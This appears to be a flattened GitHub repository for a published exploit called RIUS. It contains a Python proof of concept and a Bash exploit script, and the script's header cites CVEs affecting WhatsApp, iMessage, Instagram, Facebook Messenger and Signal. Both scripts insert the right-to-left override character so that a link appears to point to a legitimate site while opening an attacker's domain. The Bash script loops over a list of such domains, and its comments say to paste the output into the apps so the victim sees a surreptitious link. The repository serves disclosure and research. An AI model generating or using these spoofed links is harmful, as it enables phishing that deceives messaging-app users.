├── imessage.mp4 ├── instagram.gif ├── whatsapp.gif ├── messenger.jpeg ├── poc.py ├── LICENSE └── exploit.sh /imessage.mp4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zadewg/RIUS/HEAD/imessage.mp4 -------------------------------------------------------------------------------- /instagram.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zadewg/RIUS/HEAD/instagram.gif -------------------------------------------------------------------------------- /whatsapp.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zadewg/RIUS/HEAD/whatsapp.gif -------------------------------------------------------------------------------- /messenger.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zadewg/RIUS/HEAD/messenger.jpeg -------------------------------------------------------------------------------- /poc.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python2.7 2 | # coding=utf-8 3 | 4 | # RTLO Injection URI Spoofing 5 | # https://github.com/zadewg/RIUS 6 | # Copyright (C) zadewg at gmail dot com 7 | # RIUS_back.py 2019 August 11th 8 | 9 | # This POC uses a different approach than the one provided in exploit.sh 10 | 11 | import sys 12 | 13 | help = "usage: python poc.py \nnote: this script might not work depending on your consoles character set" 14 | 15 | def main(): 16 | if len(sys.argv) != 3: 17 | print(help) 18 | raise SystemExit 19 | 20 | _RTLO = (u'\u202e') 21 | 22 | _LEGWEB = sys.argv[1][::-1] if "https://" in sys.argv[1] else str("https://" + sys.argv[1])[::-1] 23 | _ATTWEB = sys.argv[2].replace('https://', '') 24 | 25 | # [RTLO_mark][legitimate_website]#/[backwards-typed_attackers_website] 26 | sys.stdout.write(' ' + _RTLO + (_ATTWEB + '#/' + _LEGWEB) + '\n') 27 | 28 | if __name__ == '__main__': 29 | main() 30 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 zadewg 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /exploit.sh: -------------------------------------------------------------------------------- 1 | # Exploit Title: RTLO Injection URI Spoofing: WhatsApp, iMessage (Messages app), Instagram, Facebook Messenger. CVE-2020-20093, CVE-2020-20094, CVE-2020-20095, CVE-2020-20096 2 | # Date: 24/03/2022 3 | # Exploit Authors: zadewg & Sick Codes 4 | # Vendor Homepage: https://www.meta.com 5 | # Vendor Homepage: https://www.instagram.com 6 | # Vendor Homepage: https://www.apple.com 7 | # Vendor Homepage: https://www.signal.org 8 | # Tested on: Whatsapp iOS 9 | # Version 2.19.80 and below 10 | # Tested on: Whatsapp Android 11 | # Version 2.19.222 and below 12 | # Tested on: Instagram iOS 13 | # Version: 106.0 and below 14 | # Tested on: Instagram iOS Android 15 | # Version: 107.0.0.11 and below 16 | # Tested on: iMessage (Messages app) 17 | # Version: iOS 14.3 and below 18 | # Tested on: Facebook Messenger app iOS 19 | # Version: 227.0 and below 20 | # Tested on: Facebook Messenger app Android 21 | # Version: 228.1.0.10.116 and below 22 | # Tested on: Signal 23 | # Version: 5.33.0.25 and below 24 | # CVE: CVE-2020-20093 25 | # CVE: CVE-2020-20094 26 | # CVE: CVE-2020-20095 27 | # CVE: CVE-2020-20096 28 | 29 | 30 | #!/bin/bash 31 | # Author: sickcodes 32 | # Contact: https://twitter.com/sickcodes https://github.com/sickcodes 33 | # Copyright: sickcodes (C) 2022 34 | # License: GPLv3+ 35 | 36 | # References: https://github.com/zadewg/RIUS 37 | # https://github.com/sickcodes/security/blob/master/exploits/SICK-2022-40.sh 38 | # https://sick.codes/sick-2022-40 39 | 40 | 41 | DESTINATIONS=(4pm.asia 42 | 4pm.tv 43 | gepj.live 44 | gepj.xyz 45 | kpa.li 46 | xcod.xyz 47 | 4pm.tv 48 | gepj.net) 49 | 50 | APPEAR_AS='https://legit.okay/files' 51 | 52 | for DESTINATION in "${DESTINATIONS[@]}"; do 53 | 54 | printf "${APPEAR_AS}/\u202E${DESTINATION}\n" 55 | 56 | done 57 | 58 | # copy paste into any of the above apps. 59 | # victim will see a surreptitious link 60 | 61 | 62 | # works on latest Signal (unpatched) 63 | --------------------------------------------------------------------------------